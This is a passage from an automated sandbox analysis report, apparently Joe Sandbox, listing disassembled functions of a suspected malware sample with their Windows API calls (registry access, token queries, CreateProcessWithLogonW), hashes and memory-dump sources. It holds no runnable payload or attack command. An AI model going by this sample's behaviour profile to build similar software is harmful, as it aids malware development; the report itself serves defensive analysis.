                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C263D8
                                        • __freea.LIBCMT ref: 00C263E5
                                          • Part of subcall function 00C23820: RtlAllocateHeap.NTDLL(00000000,?,00CC1444,?,00C0FDF5,?,?,00BFA976,00000010,00CC1440,00BF13FC,?,00BF13C6,?,00BF1129), ref: 00C23852
                                        • __freea.LIBCMT ref: 00C263EE
                                        • __freea.LIBCMT ref: 00C26413
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                        • String ID:
                                        • API String ID: 1414292761-0
                                        • Opcode ID: 5e5e8a6e2766c8c064433f1deaaee13702c96223dcf1183c789379900c1c9a94
                                        • Instruction ID: cdcbb925dbc156c5917be8f5ff52142791eb54704dc1b50fd459afc53862f3fd
                                        • Opcode Fuzzy Hash: 5e5e8a6e2766c8c064433f1deaaee13702c96223dcf1183c789379900c1c9a94
                                        • Instruction Fuzzy Hash: FA51F172A00226ABEB258F64EC81FAF7BA9EF44710F154229FD15D7590EB34DD40D6B0
                                        Function 00C7BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                          • Part of subcall function 00C7C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7B6AE,?,?), ref: 00C7C9B5
                                          • Part of subcall function 00C7C998: _wcslen.LIBCMT ref: 00C7C9F1
                                          • Part of subcall function 00C7C998: _wcslen.LIBCMT ref: 00C7CA68
                                          • Part of subcall function 00C7C998: _wcslen.LIBCMT ref: 00C7CA9E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C7BCCA
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C7BD25
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00C7BD6A
                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C7BD99
                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C7BDF3
                                        • RegCloseKey.ADVAPI32(?), ref: 00C7BDFF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                        • String ID:
                                        • API String ID: 1120388591-0
                                        • Opcode ID: 0af5a23b3f2e46646ddcbc5941559dff8663ad42b2d095927cc1ef64c95306e7
                                        • Instruction ID: 8c11c272916bc4555d70427098dc69ae47a57eb09deb99a446c3b98ec17b28b9
                                        • Opcode Fuzzy Hash: 0af5a23b3f2e46646ddcbc5941559dff8663ad42b2d095927cc1ef64c95306e7
                                        • Instruction Fuzzy Hash: 2B818F70208241AFD714DF24C895F2ABBE5FF84348F14859CF5598B2A2DB31ED49CB92
                                        Function 00C4F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(00000035), ref: 00C4F7B9
                                        • SysAllocString.OLEAUT32(00000001), ref: 00C4F860
                                        • VariantCopy.OLEAUT32(00C4FA64,00000000), ref: 00C4F889
                                        • VariantClear.OLEAUT32(00C4FA64), ref: 00C4F8AD
                                        • VariantCopy.OLEAUT32(00C4FA64,00000000), ref: 00C4F8B1
                                        • VariantClear.OLEAUT32(?), ref: 00C4F8BB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCopy$AllocInitString
                                        • String ID:
                                        • API String ID: 3859894641-0
                                        • Opcode ID: 951e95d307885e4101dd46f23f1234752b05a3909ac09cd2d85ee0215cf27192
                                        • Instruction ID: f61adc73db6c09ca2759392a20d8f2ee0bb921a9afdfd26877629ff4c3b9353b
                                        • Opcode Fuzzy Hash: 951e95d307885e4101dd46f23f1234752b05a3909ac09cd2d85ee0215cf27192
                                        • Instruction Fuzzy Hash: 6051B331A00314AADF24AF66D895B39B3E4FF55310B24946EED06DF292DB708C42D7A6
                                        Function 00C6910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF7620: _wcslen.LIBCMT ref: 00BF7625
                                          • Part of subcall function 00BF6B57: _wcslen.LIBCMT ref: 00BF6B6A
                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00C694E5
                                        • _wcslen.LIBCMT ref: 00C69506
                                        • _wcslen.LIBCMT ref: 00C6952D
                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00C69585
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen$FileName$OpenSave
                                        • String ID: X
                                        • API String ID: 83654149-3081909835
                                        • Opcode ID: f99c621079510aa80d2c9565f0b44102787cedd11566d4c49721357226fb36ae
                                        • Instruction ID: cac7ad7d5b691bcef74a84442aeaeeca73589f23c640a7f466a7d87913d2e51c
                                        • Opcode Fuzzy Hash: f99c621079510aa80d2c9565f0b44102787cedd11566d4c49721357226fb36ae
                                        • Instruction Fuzzy Hash: 44E18F71508340DFC724EF24C891A6AB7E4FF85314F0489ADF9999B2A2DB31DD49CB92
                                        Function 00C0920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C09BB2
                                        • BeginPaint.USER32(?,?,?), ref: 00C09241
                                        • GetWindowRect.USER32(?,?), ref: 00C092A5
                                        • ScreenToClient.USER32(?,?), ref: 00C092C2
                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C092D3
                                        • EndPaint.USER32(?,?,?,?,?), ref: 00C09321
                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00C471EA
                                          • Part of subcall function 00C09339: BeginPath.GDI32(00000000), ref: 00C09357
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                        • String ID:
                                        • API String ID: 3050599898-0
                                        • Opcode ID: 1393b1e5ee55cfac42ef62132175b39dee183b32075338a12b0701b887e9527b
                                        • Instruction ID: 5059493560ecd64a24569d99dd1e91742bf10b5eef073d0ba0c53db7af552b30
                                        • Opcode Fuzzy Hash: 1393b1e5ee55cfac42ef62132175b39dee183b32075338a12b0701b887e9527b
                                        • Instruction Fuzzy Hash: BC418B71108200AFD721DF25DCC8FAE7BB8EB4A720F140669F9A5872F2C7719945DB61
                                        Function 00C607EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C6080C
                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00C60847
                                        • EnterCriticalSection.KERNEL32(?), ref: 00C60863
                                        • LeaveCriticalSection.KERNEL32(?), ref: 00C608DC
                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00C608F3
                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C60921
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                        • String ID:
                                        • API String ID: 3368777196-0
                                        • Opcode ID: 2f243e66759b5d983d0882449e2f166c4cfc106f4248c0add19d213e855000df
                                        • Instruction ID: 9fdaf85efc4113471bf145f7f5160714b88aed407b8f66669089d6d028c15ba2
                                        • Opcode Fuzzy Hash: 2f243e66759b5d983d0882449e2f166c4cfc106f4248c0add19d213e855000df
                                        • Instruction Fuzzy Hash: F7416871900205EBDF24EF54DCC5AAA77B9FF44710F2440A9ED00AA297DB30DEA5DBA4
                                        Function 00C881DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00C4F3AB,00000000,?,?,00000000,?,00C4682C,00000004,00000000,00000000), ref: 00C8824C
                                        • EnableWindow.USER32(00000000,00000000), ref: 00C88272
                                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00C882D1
                                        • ShowWindow.USER32(00000000,00000004), ref: 00C882E5
                                        • EnableWindow.USER32(00000000,00000001), ref: 00C8830B
                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00C8832F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$Show$Enable$MessageSend
                                        • String ID:
                                        • API String ID: 642888154-0
                                        • Opcode ID: 99d6e20aaacd51918be0423b8cd6890a539aaef6d8bcc533973a89f49f17b52d
                                        • Instruction ID: 59ec95cdd1e71be81207d02a240f3bc0ab9edfd94d3daef2334dace2a8230165
                                        • Opcode Fuzzy Hash: 99d6e20aaacd51918be0423b8cd6890a539aaef6d8bcc533973a89f49f17b52d
                                        • Instruction Fuzzy Hash: 8441D674601640AFDF22EF15C895FE87BE0BB06718F580168F9188B673CB31A949CB58
                                        Function 00C54C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00C54C95
                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C54CB2
                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C54CEA
                                        • _wcslen.LIBCMT ref: 00C54D08
                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C54D10
                                        • _wcsstr.LIBVCRUNTIME ref: 00C54D1A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                        • String ID:
                                        • API String ID: 72514467-0
                                        • Opcode ID: bb0eb6f3eb9ac5bb3fcec439d50a19e3578640fb9b227104b556be9561979e86
                                        • Instruction ID: 3cd7fa926e08c63d92cf99e364f08087ce79fc3d84edff85b38ec53667d5e7b2
                                        • Opcode Fuzzy Hash: bb0eb6f3eb9ac5bb3fcec439d50a19e3578640fb9b227104b556be9561979e86
                                        • Instruction Fuzzy Hash: 6221D436204200BBEB299B2AEC49F7F7BACDF45755F108039FC05CA191EA61DDC5A7A4
                                        Function 00C6581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF3A97,?,?,00BF2E7F,?,?,?,00000000), ref: 00BF3AC2
                                        • _wcslen.LIBCMT ref: 00C6587B
                                        • CoInitialize.OLE32(00000000), ref: 00C65995
                                        • CoCreateInstance.OLE32(00C8FCF8,00000000,00000001,00C8FB68,?), ref: 00C659AE
                                        • CoUninitialize.OLE32 ref: 00C659CC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                        • String ID: .lnk
                                        • API String ID: 3172280962-24824748
                                        • Opcode ID: 3a1d484fe621f6c86a0ca5a4e6430727c93474102cf46b266711f48fc8b019c5
                                        • Instruction ID: e64a78cc7b7c73168f9c44cf4dddb623eab20e682bb2c38d160d3d61c6c0de5e
                                        • Opcode Fuzzy Hash: 3a1d484fe621f6c86a0ca5a4e6430727c93474102cf46b266711f48fc8b019c5
                                        • Instruction Fuzzy Hash: D3D155706047059FC724DF14C490A2EBBE1EF89714F24489DF9999B361DB31ED4ACB92
                                        Function 00C5175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C50FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C50FCA
                                          • Part of subcall function 00C50FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C50FD6
                                          • Part of subcall function 00C50FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C50FE5
                                          • Part of subcall function 00C50FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C50FEC
                                          • Part of subcall function 00C50FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C51002
                                        • GetLengthSid.ADVAPI32(?,00000000,00C51335), ref: 00C517AE
                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C517BA
                                        • HeapAlloc.KERNEL32(00000000), ref: 00C517C1
                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C517DA
                                        • GetProcessHeap.KERNEL32(00000000,00000000,00C51335), ref: 00C517EE
                                        • HeapFree.KERNEL32(00000000), ref: 00C517F5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                        • String ID:
                                        • API String ID: 3008561057-0
                                        • Opcode ID: 6efbc1044cc6592b23c14ede0c5babe14d391621dbf04d5bca66156259d92872
                                        • Instruction ID: 8f1abf5a753714a4f96775ed5f817d0cbee42c14145876911e571d3010abce91
                                        • Opcode Fuzzy Hash: 6efbc1044cc6592b23c14ede0c5babe14d391621dbf04d5bca66156259d92872
                                        • Instruction Fuzzy Hash: 2F118135500205FFDB109FA8DC8DBAF7BA9EB4A396F144118FC5197110D7359A88CB68
                                        Function 00C514CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C514FF
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00C51506
                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C51515
                                        • CloseHandle.KERNEL32(00000004), ref: 00C51520
                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C5154F
                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C51563
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                        • String ID:
                                        • API String ID: 1413079979-0
                                        • Opcode ID: 9bf63940b00ed604d651733c27c2b6b594ce8b3f2f45d9d05e2eaf124543dd37
                                        • Instruction ID: 87da2c04b473baf955eb7c89fffcccadbd5b678f352cad46607a1c89454792aa
                                        • Opcode Fuzzy Hash: 9bf63940b00ed604d651733c27c2b6b594ce8b3f2f45d9d05e2eaf124543dd37
                                        • Instruction Fuzzy Hash: 8C119D7610020DABDF118F94DD49FDE3BA9EF48745F084014FE15A2060D375CEA4EB64
                                        Function 00C13382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,00C13379,00C12FE5), ref: 00C13390
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C1339E
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C133B7
                                        • SetLastError.KERNEL32(00000000,?,00C13379,00C12FE5), ref: 00C13409
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: 099a5c3fc82238c5bbcadc3b30da5ca90b31ea24a7627befcc7ef29332f4ba68
                                        • Instruction ID: 862c1511b8ad00f10211cb4f4b2838732c73a20f0396c4ca79b92463f06a1adb
                                        • Opcode Fuzzy Hash: 099a5c3fc82238c5bbcadc3b30da5ca90b31ea24a7627befcc7ef29332f4ba68
                                        • Instruction Fuzzy Hash: B201B132609351BEAA253B757CC57EE2E94EB0737DB20032AF530851F0EF118E927658
                                        Function 00C22D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,00C25686,00C33CD6,?,00000000,?,00C25B6A,?,?,?,?,?,00C1E6D1,?,00CB8A48), ref: 00C22D78
                                        • _free.LIBCMT ref: 00C22DAB
                                        • _free.LIBCMT ref: 00C22DD3
                                        • SetLastError.KERNEL32(00000000,?,?,?,?,00C1E6D1,?,00CB8A48,00000010,00BF4F4A,?,?,00000000,00C33CD6), ref: 00C22DE0
                                        • SetLastError.KERNEL32(00000000,?,?,?,?,00C1E6D1,?,00CB8A48,00000010,00BF4F4A,?,?,00000000,00C33CD6), ref: 00C22DEC
                                        • _abort.LIBCMT ref: 00C22DF2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        • Opcode ID: 8e515c3a5f831b748e5dff5acb52ffb8ffac15a8261d1123ab05521eac2b4c11
                                        • Instruction ID: 9294cceff1112255baf86e1801f13789c9462ea9175146b58fb7cf73946a8d74
                                        • Opcode Fuzzy Hash: 8e515c3a5f831b748e5dff5acb52ffb8ffac15a8261d1123ab05521eac2b4c11
                                        • Instruction Fuzzy Hash: 9AF0C83654463077C2123739BC46F5E2659AFC27A1F240528F834929E2EF348902A270
                                        Function 00C88A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C09639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C09693
                                          • Part of subcall function 00C09639: SelectObject.GDI32(?,00000000), ref: 00C096A2
                                          • Part of subcall function 00C09639: BeginPath.GDI32(?), ref: 00C096B9
                                          • Part of subcall function 00C09639: SelectObject.GDI32(?,00000000), ref: 00C096E2
                                        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00C88A4E
                                        • LineTo.GDI32(?,00000003,00000000), ref: 00C88A62
                                        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00C88A70
                                        • LineTo.GDI32(?,00000000,00000003), ref: 00C88A80
                                        • EndPath.GDI32(?), ref: 00C88A90
                                        • StrokePath.GDI32(?), ref: 00C88AA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                        • String ID:
                                        • API String ID: 43455801-0
                                        • Opcode ID: 96c4ed3f3f94ac45f9426ead42067a7d7e6d28522fd7f720fbbca96498407fcc
                                        • Instruction ID: 720d4d0f7af25a6c2cfdb831e0fbdc5847958eb0423745d169f09b50fff40b9a
